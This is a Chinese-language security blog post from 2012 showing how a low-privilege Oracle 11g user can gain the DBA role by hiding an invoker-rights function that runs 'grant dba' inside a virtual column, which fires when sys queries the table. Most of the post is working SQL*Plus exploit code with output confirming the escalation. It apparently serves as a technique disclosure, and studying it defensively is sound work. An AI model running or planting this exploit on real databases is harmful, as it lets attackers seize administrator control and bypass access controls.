Oracle 11g 利用virtual columns 获取DBA权限
作者:Birdarmy
微安全- 新浪微博安全组技术博客 首发,转载请注明出处
[感谢Linux520的Birdarmy同学友情投稿]
在Oracle 11g中系统提供了一个新功能 Virtual columns 。
官网描述:
A virtual column is not stored on disk. Rather, the database derives the values in a virtual column on demand by computing a set of expressions or functions. Virtual columns can be used in queries, DML, and DDL statements.
系统利用virtual columns,在需要使用此列数据的时候才调用运算或者函数,不在硬盘上保存结果,类似view功能。
virtual columns 语法
column_name [datatype] [GENERATED ALWAYS] AS (expression) [VIRTUAL]
例如:
SQL> create table test(a int,b int,c generated always as (a+b) virtual);
Table created.
SQL> insert into test (a ,b ) values (10,20);
1 row created.
SQL> select * from test;
A B C
———- ———- ———-
10 20 30
由于此功能可以使用函数,如果用户同时拥有创建函数的权限,那么就可以利用oracle提升权限中常用的授权函数。在虚拟列中使用授权函数,当sys进行查询的时候,就会触发事件,或者其余任何方式,只要触发这个函数即可,就可以成功将用户 提升到DBA权限
例:
首先我们创建一个用户birdarmy,让其拥有创建表和函数的权限,为了方便测试这里我直接赋予他们connect和resource权限。
SQL> create user birdarmy identified by 123456;
User created.
SQL> grant connect,resource to birdarmy;
Grant succeeded.
以birdarmy权限进行登录,创建利用函数和表。
[oracle@ORA-TEST-03 ~]$ sqlplus birdarmy@gc12
SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:36:12 2012
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Enter password:
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 – 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
创建一个授权函数,使用grant dba to birdarmy进行提升权限。当sys等具有高级赋权功能的用户调用此函数的时候,就将birdarmy的权限提升为DBA。
SQL> CREATE OR REPLACE FUNCTION GRANT_DBA_TO_USER (v IN INT)
RETURN INT AUTHID CURRENT_USER DETERMINISTIC
AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE ‘grant dba to birdarmy‘;
RETURN 0;
END GRANT_DBA_TO_USER;
/
创建一个测试表 exploit_virtual_columns,在虚拟列上使用授权函数。
SQL> create table exploit_virtual_columns(a int,b generated always AS (GRANT_DBA_TO_USER (a)) virtual);
插入一条数据,这样用户查询exploit_virtual_columns表的时候才会触发虚拟列的函数。
SQL> insert into exploit_virtual_columns (a) values (1);
查看当前用户的权限,仅为connect,resource。
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
BIRDARMY CONNECT NO YES NO
BIRDARMY RESOURCE NO YES NO
[oracle@ORA-TEST-03 ~]$ sqlplus / as sysdba
SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:42:43 2012
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 – 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
用sys用户查询exploit_virtual_columns,触发虚拟列中GRANT_DBA_TO_USER函数。
SQL> select * from birdarmy.exploit_virtual_columns;
A B
———- ———-
1 0
[oracle@ORA-TEST-03 ~]$ sqlplus birdarmy@gc12
SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:43:14 2012
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Enter password:
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 – 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
查看用户权限,成功获取DBA权限
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
BIRDARMY CONNECT NO YES NO
BIRDARMY DBA NO YES NO
BIRDARMY RESOURCE NO YES NO